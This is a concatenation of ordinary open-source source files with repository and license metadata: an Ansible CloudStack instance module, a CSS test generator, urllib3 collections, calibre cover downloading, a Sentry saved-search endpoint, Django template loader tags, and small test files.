self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
instance = res['virtualmachine']
self.instance = instance
# Reset SSH key
if ssh_key_changed:
instance = self.cs.resetSSHKeyForVirtualMachine(**args_ssh_key)
if 'errortext' in instance:
self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])
instance = self.poll_job(instance, 'virtualmachine')
self.instance = instance
# Start VM again if it was running before
if instance_state == 'running' and start_vm:
instance = self.start_instance()
return instance
def recover_instance(self, instance):
if instance['state'].lower() in [ 'destroying', 'destroyed' ]:
self.result['changed'] = True
if not self.module.check_mode:
res = self.cs.recoverVirtualMachine(id=instance['id'])
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
instance = res['virtualmachine']
return instance
def absent_instance(self):
instance = self.get_instance()
if instance:
if instance['state'].lower() not in ['expunging', 'destroying', 'destroyed']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.cs.destroyVirtualMachine(id=instance['id'])
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(res, 'virtualmachine')
return instance
def expunge_instance(self):
instance = self.get_instance()
if instance:
res = {}
if instance['state'].lower() in [ 'destroying', 'destroyed' ]:
self.result['changed'] = True
if not self.module.check_mode:
res = self.cs.destroyVirtualMachine(id=instance['id'], expunge=True)
elif instance['state'].lower() not in [ 'expunging' ]:
self.result['changed'] = True
if not self.module.check_mode:
res = self.cs.destroyVirtualMachine(id=instance['id'], expunge=True)
if res and 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
res = self.poll_job(res, 'virtualmachine')
return instance
def stop_instance(self):
instance = self.get_instance()
# in check mode intance may not be instanciated
if instance:
if instance['state'].lower() in ['stopping', 'stopped']:
return instance
if instance['state'].lower() in ['starting', 'running']:
self.result['changed'] = True
if not self.module.check_mode:
instance = self.cs.stopVirtualMachine(id=instance['id'])
if 'errortext' in instance:
self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def start_instance(self):
instance = self.get_instance()
# in check mode intance may not be instanciated
if instance:
if instance['state'].lower() in ['starting', 'running']:
return instance
if instance['state'].lower() in ['stopped', 'stopping']:
self.result['changed'] = True
if not self.module.check_mode:
instance = self.cs.startVirtualMachine(id=instance['id'])
if 'errortext' in instance:
self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def restart_instance(self):
instance = self.get_instance()
# in check mode intance may not be instanciated
if instance:
if instance['state'].lower() in [ 'running', 'starting' ]:
self.result['changed'] = True
if not self.module.check_mode:
instance = self.cs.rebootVirtualMachine(id=instance['id'])
if 'errortext' in instance:
self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
elif instance['state'].lower() in [ 'stopping', 'stopped' ]:
instance = self.start_instance()
return instance
def restore_instance(self):
instance = self.get_instance()
self.result['changed'] = True
# in check mode intance may not be instanciated
if instance:
args = {}
args['templateid'] = self.get_template_or_iso(key='id')
args['virtualmachineid'] = instance['id']
res = self.cs.restoreVirtualMachine(**args)
if 'errortext' in res:
self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(res, 'virtualmachine')
return instance
def get_result(self, instance):
super(AnsibleCloudStackInstance, self).get_result(instance)
if instance:
if 'securitygroup' in instance:
security_groups = []
for securitygroup in instance['securitygroup']:
security_groups.append(securitygroup['name'])
self.result['security_groups'] = security_groups
if 'affinitygroup' in instance:
affinity_groups = []
for affinitygroup in instance['affinitygroup']:
affinity_groups.append(affinitygroup['name'])
self.result['affinity_groups'] = affinity_groups
if 'nic' in instance:
for nic in instance['nic']:
if nic['isdefault'] and 'ipaddress' in nic:
self.result['default_ip'] = nic['ipaddress']
return self.result
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
name = dict(default=None),
display_name = dict(default=None),
group = dict(default=None),
state = dict(choices=['present', 'deployed', 'started', 'stopped', 'restarted', 'restored', 'absent', 'destroyed', 'expunged'], default='present'),
service_offering = dict(default=None),
cpu = dict(default=None, type='int'),
cpu_speed = dict(default=None, type='int'),
memory = dict(default=None, type='int'),
template = dict(default=None),
iso = dict(default=None),
template_filter = dict(default="executable", aliases=['iso_filter'], choices=['featured', 'self', 'selfexecutable', 'sharedexecutable', 'executable', 'community']),
networks = dict(type='list', aliases=[ 'network' ], default=None),
ip_to_networks = dict(type='list', aliases=['ip_to_network'], default=None),
ip_address = dict(defaul=None),
ip6_address = dict(defaul=None),
disk_offering = dict(default=None),
disk_size = dict(type='int', default=None),
root_disk_size = dict(type='int', default=None),
keyboard = dict(choices=['de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us'], default=None),
hypervisor = dict(choices=CS_HYPERVISORS, default=None),
security_groups = dict(type='list', aliases=[ 'security_group' ], default=None),
affinity_groups = dict(type='list', aliases=[ 'affinity_group' ], default=[]),
domain = dict(default=None),
account = dict(default=None),
project = dict(default=None),
user_data = dict(default=None),
zone = dict(default=None),
ssh_key = dict(default=None),
force = dict(type='bool', default=False),
tags = dict(type='list', aliases=[ 'tag' ], default=None),
vpc = dict(default=None),
poll_async = dict(type='bool', default=True),
))
required_together = cs_required_together()
required_together.extend([
['cpu', 'cpu_speed', 'memory'],
])
module = AnsibleModule(
argument_spec=argument_spec,
required_together=required_together,
required_one_of = (
['display_name', 'name'],
),
mutually_exclusive = (
['template', 'iso'],
),
supports_check_mode=True
)
try:
acs_instance = AnsibleCloudStackInstance(module)
state = module.params.get('state')
if state in ['absent', 'destroyed']:
instance = acs_instance.absent_instance()
elif state in ['expunged']:
instance = acs_instance.expunge_instance()
elif state in ['restored']:
acs_instance.present_instance()
instance = acs_instance.restore_instance()
elif state in ['present', 'deployed']:
instance = acs_instance.present_instance()
elif state in ['stopped']:
acs_instance.present_instance(start_vm=False)
instance = acs_instance.stop_instance()
elif state in ['started']:
acs_instance.present_instance()
instance = acs_instance.start_instance()
elif state in ['restarted']:
acs_instance.present_instance()
instance = acs_instance.restart_instance()
if instance and 'state' in instance and instance['state'].lower() == 'error':
module.fail_json(msg="Instance named '%s' in error state." % module.params.get('name'))
result = acs_instance.get_result(instance)
except CloudStackException as e:
module.fail_json(msg='CloudStackException: %s' % str(e))
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
alon/servo
|
tests/wpt/css-tests/css-text-3_dev/xhtml1print/support/generate-segment-break-transformation-rules-tests.py
|
324
|
4862
|
#!/usr/bin/env python
# - * - coding: UTF-8 - * -
"""
This script generates tests segment-break-transformation-rules-001 ~ 049 which
cover all possible combinations of characters at two sides of segment breaks.
More specifically, there are seven types of characters involve in these rules:
1. East Asian Full-width (F)
2. East Asian Half-width (H)
3. East Asian Wide (W) except Hangul
4. East Asian Narrow (Na)
5. East Asian Ambiguous (A)
6. Not East Asian (Neutral)
7. Hangul
So there are 49 different combinations. It outputs a list of all
tests it generated in the format of Mozilla reftest.list to the stdout.
"""
from __future__ import unicode_literals
TEST_FILE = 'segment-break-transformation-rules-{:03}.html'
TEST_TEMPLATE = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reftest Test: Segment Break Transformation Rules</title>
<link rel="author" title="Chun-Min (Jeremy) Chen" href="mailto:[email protected]">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="help" href="https://drafts.csswg.org/css-text-3/#line-break-transform">
<meta name="assert" content="'segment-break-transformation-rules: with {prev}/{next} in front/back of the semgment break.">
<link rel="stylesheet" type="text/css" href="support/ahem.css" />
<link rel="match" href="segment-break-transformation-rules-{index:03}-ref.html">
<style> p {{ font-family: ahem; }} </style>
<div>Pass if there is {expect} white space between the two strings below.
<p>{prevchar}
{nextchar}</p>
</div>
'''
REF_FILE = 'segment-break-transformation-rules-{:03}-ref.html'
REF_TEMPLATE_REMOVE = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reftest Reference: Segment Break Transformation Rules</title>
<link rel="author" title="Chun-Min (Jeremy) Chen" href="mailto:[email protected]">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="stylesheet" type="text/css" href="support/ahem.css" />
<style> p {{ font-family: ahem; }} </style>
<div>Pass if there is NO white space between the two strings below.
<p>{0}{1}</p>
</div>
'''
REF_TEMPLATE_KEEP = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reftest Reference: Segment Break Transformation Rules</title>
<link rel="author" title="Chun-Min (Jeremy) Chen" href="mailto:[email protected]">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="stylesheet" type="text/css" href="support/ahem.css" />
<style> p {{ font-family: ahem; }} </style>
<div>Pass if there is ONE white space between the two strings below.
<p>{0}{2}{1}</p>
</div>
'''
CHAR_SET = [
('East Asian Full-width (F)', 'FULLWIDTH'),
('East Asian Half-width (H)', 'テスト'),
('East Asian Wide (W) except Hangul', '測試'),
('East Asian Narrow (Na)', 'narrow'),
('East Asian Ambiguous (A)', '■'),
('Not East Asian (Neutral)', 'آزمون'),
('Hangul', '테스트'),
]
def write_file(filename, content):
with open(filename, 'wb') as f:
f.write(content.encode('UTF-8'))
print("# START tests from {}".format(__file__))
global idx
idx = 0
for i, (prevtype, prevchars) in enumerate(CHAR_SET):
for j, (nextype, nextchars) in enumerate(CHAR_SET):
idx += 1
reffilename = REF_FILE.format(idx)
testfilename = TEST_FILE.format(idx)
# According to CSS Text 3 - 4.1.2. Segment Break Transformation Rules,
# if the East Asian Width property of both the character before and
# after the segment break is F, W, or H (not A), and neither side is
# Hangul, then the segment break is removed. Otherwise, the segment
# break is converted to a space (U+0020).
if i < 3 and j < 3:
write_file(reffilename,
REF_TEMPLATE_REMOVE.format(prevchars, nextchars))
write_file(testfilename,
TEST_TEMPLATE.format(index=idx, prev=prevtype,
next=nextype,
prevchar=prevchars,
nextchar=nextchars,
expect='NO'))
else:
write_file(reffilename,
REF_TEMPLATE_KEEP.format(prevchars, nextchars, ' '))
write_file(testfilename,
TEST_TEMPLATE.format(index=idx, prev=prevtype,
next=nextype,
prevchar=prevchars,
nextchar=nextchars,
expect='ONE'))
print("== {} {}".format(testfilename, reffilename))
print("# END tests from {}".format(__file__))
|
mpl-2.0
|
lausser/coshsh
|
tests/test_application_mysql.py
|
1
|
3116
|
import unittest
import sys
import os
import logging
sys.dont_write_bytecode = True
sys.path.insert(0, os.path.abspath(".."))
#sys.path.insert(0, os.path.abspath(os.path.join("..", "coshsh")))
import coshsh
from coshsh.generator import Generator
#from datasource import Datasource
from coshsh.host import Host
from coshsh.application import Application
from coshsh.monitoringdetail import MonitoringDetail
from coshsh.util import setup_logging
logger = logging.getLogger('coshsh')
class CoshshTest(unittest.TestCase):
def setUp(self):
self.generator = Generator()
setup_logging()
self.hosts = {}
self.applications = {}
coshsh.application.Application.init_classes([
os.path.join(os.path.dirname(__file__), '../recipes/default/classes'),
os.path.join(os.path.dirname(__file__), 'recipes/test10/classes')])
MonitoringDetail.init_classes([
os.path.join(os.path.dirname(__file__), '../recipes/default/classes'),
os.path.join(os.path.dirname(__file__), 'recipes/test10/classes')])
pass
row = ['drivelsrv', '11.120.9.10', 'Server', 'Red Hat 6.0', '', 'vs', '7x24', '2nd floor', 'ps']
final_row = { }
for (index, value) in enumerate(['host_name', 'address', 'type', 'os', 'hardware', 'virtual', 'notification_period', 'location', 'department']):
final_row[value] = [None if row[index] == "" else row[index]][0]
h = coshsh.host.Host(final_row)
self.hosts[h.host_name] = h
row = ['drivel', 'mysql', '', '', '', 'drivelsrv', '7x24']
final_row = { }
for (index, value) in enumerate(['name', 'type', 'component', 'version', 'patchlevel', 'host_name', 'check_period']):
final_row[value] = [None if row[index] == "" else row[index]][0]
a = coshsh.application.Application(final_row)
#a.__init__(final_row)
self.applications[a.fingerprint()] = a
setattr(a, "host", self.hosts[a.host_name])
def test_create_server(self):
self.assert_("drivelsrv" in self.hosts)
h = self.hosts["drivelsrv"]
a = self.applications["drivelsrv+drivel+mysql"]
self.assert_(hasattr(h, 'host_name'))
self.assert_(h.host_name == 'drivelsrv')
self.assert_(hasattr(a, 'host_name'))
self.assert_(a.host_name == 'drivelsrv')
self.assert_(hasattr(a, "port"))
self.assert_(a.port == 3306)
def test_create_server_alternative_port(self):
self.assert_("drivelsrv" in self.hosts)
h = self.hosts["drivelsrv"]
a = self.applications["drivelsrv+drivel+mysql"]
self.assert_(hasattr(h, 'host_name'))
self.assert_(h.host_name == 'drivelsrv')
self.assert_(hasattr(a, 'host_name'))
self.assert_(a.host_name == 'drivelsrv')
a.monitoring_details.append(coshsh.monitoringdetail.MonitoringDetail({
"monitoring_type" : "PORT",
"monitoring_0" : 10000}))
a.resolve_monitoring_details()
self.assert_(a.port == 10000)
if __name__ == '__main__':
unittest.main()
|
agpl-3.0
|
danielvdao/facebookMacBot
|
venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/_collections.py
|
327
|
6557
|
# urllib3/_collections.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from collections import Mapping, MutableMapping
try:
from threading import RLock
except ImportError: # Platform-specific: No threads available
class RLock:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
pass
try: # Python 2.7+
from collections import OrderedDict
except ImportError:
from .packages.ordered_dict import OrderedDict
from .packages.six import itervalues
__all__ = ['RecentlyUsedContainer', 'HTTPHeaderDict']
_Null = object()
class RecentlyUsedContainer(MutableMapping):
"""
Provides a thread-safe dict-like container which maintains up to
``maxsize`` keys while throwing away the least-recently-used keys beyond
``maxsize``.
:param maxsize:
Maximum number of recent elements to retain.
:param dispose_func:
Every time an item is evicted from the container,
``dispose_func(value)`` is called. Callback which will get called
"""
ContainerCls = OrderedDict
def __init__(self, maxsize=10, dispose_func=None):
self._maxsize = maxsize
self.dispose_func = dispose_func
self._container = self.ContainerCls()
self.lock = RLock()
def __getitem__(self, key):
# Re-insert the item, moving it to the end of the eviction line.
with self.lock:
item = self._container.pop(key)
self._container[key] = item
return item
def __setitem__(self, key, value):
evicted_value = _Null
with self.lock:
# Possibly evict the existing value of 'key'
evicted_value = self._container.get(key, _Null)
self._container[key] = value
# If we didn't evict an existing value, we might have to evict the
# least recently used item from the beginning of the container.
if len(self._container) > self._maxsize:
_key, evicted_value = self._container.popitem(last=False)
if self.dispose_func and evicted_value is not _Null:
self.dispose_func(evicted_value)
def __delitem__(self, key):
with self.lock:
value = self._container.pop(key)
if self.dispose_func:
self.dispose_func(value)
def __len__(self):
with self.lock:
return len(self._container)
def __iter__(self):
raise NotImplementedError('Iteration over this class is unlikely to be threadsafe.')
def clear(self):
with self.lock:
# Copy pointers to all values, then wipe the mapping
# under Python 2, this copies the list of values twice :-|
values = list(self._container.values())
self._container.clear()
if self.dispose_func:
for value in values:
self.dispose_func(value)
def keys(self):
with self.lock:
return self._container.keys()
class HTTPHeaderDict(MutableMapping):
"""
:param headers:
An iterable of field-value pairs. Must not contain multiple field names
when compared case-insensitively.
:param kwargs:
Additional field-value pairs to pass in to ``dict.update``.
A ``dict`` like container for storing HTTP Headers.
Field names are stored and compared case-insensitively in compliance with
RFC 2616. Iteration provides the first case-sensitive key seen for each
case-insensitive pair.
Using ``__setitem__`` syntax overwrites fields that compare equal
case-insensitively in order to maintain ``dict``'s api. For fields that
compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add``
in a loop.
If multiple fields that are equal case-insensitively are passed to the
constructor or ``.update``, the behavior is undefined and some will be
lost.
>>> headers = HTTPHeaderDict()
>>> headers.add('Set-Cookie', 'foo=bar')
>>> headers.add('set-cookie', 'baz=quxx')
>>> headers['content-length'] = '7'
>>> headers['SET-cookie']
'foo=bar, baz=quxx'
>>> headers['Content-Length']
'7'
If you want to access the raw headers with their original casing
for debugging purposes you can access the private ``._data`` attribute
which is a normal python ``dict`` that maps the case-insensitive key to a
list of tuples stored as (case-sensitive-original-name, value). Using the
structure from above as our example:
>>> headers._data
{'set-cookie': [('Set-Cookie', 'foo=bar'), ('set-cookie', 'baz=quxx')],
'content-length': [('content-length', '7')]}
"""
def __init__(self, headers=None, **kwargs):
self._data = {}
if headers is None:
headers = {}
self.update(headers, **kwargs)
def add(self, key, value):
"""Adds a (name, value) pair, doesn't overwrite the value if it already
exists.
>>> headers = HTTPHeaderDict(foo='bar')
>>> headers.add('Foo', 'baz')
>>> headers['foo']
'bar, baz'
"""
self._data.setdefault(key.lower(), []).append((key, value))
def getlist(self, key):
"""Returns a list of all the values for the named field. Returns an
empty list if the key doesn't exist."""
return self[key].split(', ') if key in self else []
def copy(self):
h = HTTPHeaderDict()
for key in self._data:
for rawkey, value in self._data[key]:
h.add(rawkey, value)
return h
def __eq__(self, other):
if not isinstance(other, Mapping):
return False
other = HTTPHeaderDict(other)
return dict((k1, self[k1]) for k1 in self._data) == \
dict((k2, other[k2]) for k2 in other._data)
def __getitem__(self, key):
values = self._data[key.lower()]
return ', '.join(value[1] for value in values)
def __setitem__(self, key, value):
self._data[key.lower()] = [(key, value)]
def __delitem__(self, key):
del self._data[key.lower()]
def __len__(self):
return len(self._data)
def __iter__(self):
for headers in itervalues(self._data):
yield headers[0][0]
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, dict(self.items()))
|
mit
|
jwhui/openthread
|
tools/harness-automation/cases/leader_5_6_6.py
|
18
|
1877
|
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
from autothreadharness.harness_case import HarnessCase
class Leader_5_6_6(HarnessCase):
role = HarnessCase.ROLE_LEADER
case = '5 6 6'
golden_devices_required = 3
def on_dialog(self, dialog, title):
pass
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
drxaero/calibre
|
src/calibre/ebooks/metadata/sources/covers.py
|
13
|
5969
|
#!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2011, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import time
from Queue import Queue, Empty
from threading import Thread, Event
from io import BytesIO
from calibre.customize.ui import metadata_plugins
from calibre.ebooks.metadata.sources.base import create_log
from calibre.ebooks.metadata.sources.prefs import msprefs
from calibre.utils.magick.draw import Image, save_cover_data_to
class Worker(Thread):
def __init__(self, plugin, abort, title, authors, identifiers, timeout, rq, get_best_cover=False):
Thread.__init__(self)
self.daemon = True
self.plugin = plugin
self.abort = abort
self.get_best_cover = get_best_cover
self.buf = BytesIO()
self.log = create_log(self.buf)
self.title, self.authors, self.identifiers = (title, authors,
identifiers)
self.timeout, self.rq = timeout, rq
self.time_spent = None
def run(self):
start_time = time.time()
if not self.abort.is_set():
try:
if self.plugin.can_get_multiple_covers:
self.plugin.download_cover(self.log, self.rq, self.abort,
title=self.title, authors=self.authors, get_best_cover=self.get_best_cover,
identifiers=self.identifiers, timeout=self.timeout)
else:
self.plugin.download_cover(self.log, self.rq, self.abort,
title=self.title, authors=self.authors,
identifiers=self.identifiers, timeout=self.timeout)
except:
self.log.exception('Failed to download cover from',
self.plugin.name)
self.time_spent = time.time() - start_time
def is_worker_alive(workers):
for w in workers:
if w.is_alive():
return True
return False
def process_result(log, result):
plugin, data = result
try:
im = Image()
im.load(data)
if getattr(plugin, 'auto_trim_covers', False):
im.trim(10)
width, height = im.size
fmt = im.format
if width < 50 or height < 50:
raise ValueError('Image too small')
data = save_cover_data_to(im, '/cover.jpg', return_data=True)
except:
log.exception('Invalid cover from', plugin.name)
return None
return (plugin, width, height, fmt, data)
def run_download(log, results, abort,
title=None, authors=None, identifiers={}, timeout=30, get_best_cover=False):
'''
Run the cover download, putting results into the queue :param:`results`.
Each result is a tuple of the form:
(plugin, width, height, fmt, bytes)
'''
if title == _('Unknown'):
title = None
if authors == [_('Unknown')]:
authors = None
plugins = [p for p in metadata_plugins(['cover']) if p.is_configured()]
rq = Queue()
workers = [Worker(p, abort, title, authors, identifiers, timeout, rq, get_best_cover=get_best_cover) for p
in plugins]
for w in workers:
w.start()
first_result_at = None
wait_time = msprefs['wait_after_first_cover_result']
found_results = {}
start_time = time.time() # Use a global timeout to workaround misbehaving plugins that hang
while time.time() - start_time < 301:
time.sleep(0.1)
try:
x = rq.get_nowait()
result = process_result(log, x)
if result is not None:
results.put(result)
found_results[result[0]] = result
if first_result_at is not None:
first_result_at = time.time()
except Empty:
pass
if not is_worker_alive(workers):
break
if first_result_at is not None and time.time() - first_result_at > wait_time:
log('Not waiting for any more results')
abort.set()
if abort.is_set():
break
while True:
try:
x = rq.get_nowait()
result = process_result(log, x)
if result is not None:
results.put(result)
found_results[result[0]] = result
except Empty:
break
for w in workers:
wlog = w.buf.getvalue().strip()
log('\n'+'*'*30, w.plugin.name, 'Covers', '*'*30)
log('Request extra headers:', w.plugin.browser.addheaders)
if w.plugin in found_results:
result = found_results[w.plugin]
log('Downloaded cover:', '%dx%d'%(result[1], result[2]))
else:
log('Failed to download valid cover')
if w.time_spent is None:
log('Download aborted')
else:
log('Took', w.time_spent, 'seconds')
if wlog:
log(wlog)
log('\n'+'*'*80)
def download_cover(log,
title=None, authors=None, identifiers={}, timeout=30):
'''
Synchronous cover download. Returns the "best" cover as per user
prefs/cover resolution.
Returned cover is a tuple: (plugin, width, height, fmt, data)
Returns None if no cover is found.
'''
rq = Queue()
abort = Event()
run_download(log, rq, abort, title=title, authors=authors,
identifiers=identifiers, timeout=timeout, get_best_cover=True)
results = []
while True:
try:
results.append(rq.get_nowait())
except Empty:
break
cp = msprefs['cover_priorities']
def keygen(result):
plugin, width, height, fmt, data = result
return (cp.get(plugin.name, 1), 1/(width*height))
results.sort(key=keygen)
return results[0] if results else None
|
gpl-3.0
|
hongliang5623/sentry
|
src/sentry/api/endpoints/project_search_details.py
|
23
|
2463
|
from __future__ import absolute_import
from rest_framework import serializers
from rest_framework.response import Response
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.api.serializers import serialize
from sentry.models import SavedSearch
class SavedSearchSerializer(serializers.Serializer):
name = serializers.CharField(max_length=128, required=True)
query = serializers.CharField(required=True)
class ProjectSearchDetailsEndpoint(ProjectEndpoint):
def get(self, request, project, search_id):
"""
Retrieve a saved search
Return details on an individual saved search.
{method} {path}
"""
try:
search = SavedSearch.objects.get(
project=project,
id=search_id,
)
except SavedSearch.DoesNotExist:
raise ResourceDoesNotExist
return Response(serialize(search, request.user))
def put(self, request, project, search_id):
"""
Update a saved search
Update a saved search.
{method} {path}
{{
"version": "abcdef",
"dateSavedSearchd": "2015-05-11T02:23:10Z"
}}
"""
try:
search = SavedSearch.objects.get(
project=project,
id=search_id,
)
except SavedSearch.DoesNotExist:
raise ResourceDoesNotExist
serializer = SavedSearchSerializer(data=request.DATA, partial=True)
if not serializer.is_valid():
return Response(serializer.errors, status=400)
result = serializer.object
kwargs = {}
if result.get('name'):
kwargs['name'] = result['name']
if result.get('text'):
kwargs['text'] = result['text']
if kwargs:
search.update(**kwargs)
return Response(serialize(search, request.user))
def delete(self, request, project, search_id):
"""
Delete a saved search
Permanently remove a saved search.
{method} {path}
"""
try:
search = SavedSearch.objects.get(
project=project,
id=search_id,
)
except SavedSearch.DoesNotExist:
raise ResourceDoesNotExist
search.delete()
return Response(status=204)
|
bsd-3-clause
|
abhattad4/Digi-Menu
|
django/template/loader_tags.py
|
100
|
9868
|
from collections import defaultdict
from django.template.base import (
Library, Node, Template, TemplateSyntaxError, TextNode, Variable,
token_kwargs,
)
from django.utils import six
from django.utils.safestring import mark_safe
register = Library()
BLOCK_CONTEXT_KEY = 'block_context'
class ExtendsError(Exception):
pass
class BlockContext(object):
def __init__(self):
# Dictionary of FIFO queues.
self.blocks = defaultdict(list)
def add_blocks(self, blocks):
for name, block in six.iteritems(blocks):
self.blocks[name].insert(0, block)
def pop(self, name):
try:
return self.blocks[name].pop()
except IndexError:
return None
def push(self, name, block):
self.blocks[name].append(block)
def get_block(self, name):
try:
return self.blocks[name][-1]
except IndexError:
return None
class BlockNode(Node):
def __init__(self, name, nodelist, parent=None):
self.name, self.nodelist, self.parent = name, nodelist, parent
def __repr__(self):
return "<Block Node: %s. Contents: %r>" % (self.name, self.nodelist)
def render(self, context):
block_context = context.render_context.get(BLOCK_CONTEXT_KEY)
with context.push():
if block_context is None:
context['block'] = self
result = self.nodelist.render(context)
else:
push = block = block_context.pop(self.name)
if block is None:
block = self
# Create new block so we can store context without thread-safety issues.
block = type(self)(block.name, block.nodelist)
block.context = context
context['block'] = block
result = block.nodelist.render(context)
if push is not None:
block_context.push(self.name, push)
return result
def super(self):
if not hasattr(self, 'context'):
raise TemplateSyntaxError(
"'%s' object has no attribute 'context'. Did you use "
"{{ block.super }} in a base template?" % self.__class__.__name__
)
render_context = self.context.render_context
if (BLOCK_CONTEXT_KEY in render_context and
render_context[BLOCK_CONTEXT_KEY].get_block(self.name) is not None):
return mark_safe(self.render(self.context))
return ''
class ExtendsNode(Node):
must_be_first = True
def __init__(self, nodelist, parent_name, template_dirs=None):
self.nodelist = nodelist
self.parent_name = parent_name
self.template_dirs = template_dirs
self.blocks = {n.name: n for n in nodelist.get_nodes_by_type(BlockNode)}
def __repr__(self):
return '<ExtendsNode: extends %s>' % self.parent_name.token
def get_parent(self, context):
parent = self.parent_name.resolve(context)
if not parent:
error_msg = "Invalid template name in 'extends' tag: %r." % parent
if self.parent_name.filters or\
isinstance(self.parent_name.var, Variable):
error_msg += " Got this from the '%s' variable." %\
self.parent_name.token
raise TemplateSyntaxError(error_msg)
if isinstance(parent, Template):
# parent is a django.template.Template
return parent
if isinstance(getattr(parent, 'template', None), Template):
# parent is a django.template.backends.django.Template
return parent.template
return context.template.engine.get_template(parent)
def render(self, context):
compiled_parent = self.get_parent(context)
if BLOCK_CONTEXT_KEY not in context.render_context:
context.render_context[BLOCK_CONTEXT_KEY] = BlockContext()
block_context = context.render_context[BLOCK_CONTEXT_KEY]
# Add the block nodes from this node to the block context
block_context.add_blocks(self.blocks)
# If this block's parent doesn't have an extends node it is the root,
# and its block nodes also need to be added to the block context.
for node in compiled_parent.nodelist:
# The ExtendsNode has to be the first non-text node.
if not isinstance(node, TextNode):
if not isinstance(node, ExtendsNode):
blocks = {n.name: n for n in
compiled_parent.nodelist.get_nodes_by_type(BlockNode)}
block_context.add_blocks(blocks)
break
# Call Template._render explicitly so the parser context stays
# the same.
return compiled_parent._render(context)
class IncludeNode(Node):
def __init__(self, template, *args, **kwargs):
self.template = template
self.extra_context = kwargs.pop('extra_context', {})
self.isolated_context = kwargs.pop('isolated_context', False)
super(IncludeNode, self).__init__(*args, **kwargs)
def render(self, context):
try:
template = self.template.resolve(context)
# Does this quack like a Template?
if not callable(getattr(template, 'render', None)):
# If not, we'll try get_template
template = context.template.engine.get_template(template)
values = {
name: var.resolve(context)
for name, var in six.iteritems(self.extra_context)
}
if self.isolated_context:
return template.render(context.new(values))
with context.push(**values):
return template.render(context)
except Exception:
if context.template.engine.debug:
raise
return ''
@register.tag('block')
def do_block(parser, token):
"""
Define a block that can be overridden by child templates.
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
bits = token.contents.split()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' tag takes only one argument" % bits[0])
block_name = bits[1]
# Keep track of the names of BlockNodes found in this template, so we can
# check for duplication.
try:
if block_name in parser.__loaded_blocks:
raise TemplateSyntaxError("'%s' tag with name '%s' appears more than once" % (bits[0], block_name))
parser.__loaded_blocks.append(block_name)
except AttributeError: # parser.__loaded_blocks isn't a list yet
parser.__loaded_blocks = [block_name]
nodelist = parser.parse(('endblock',))
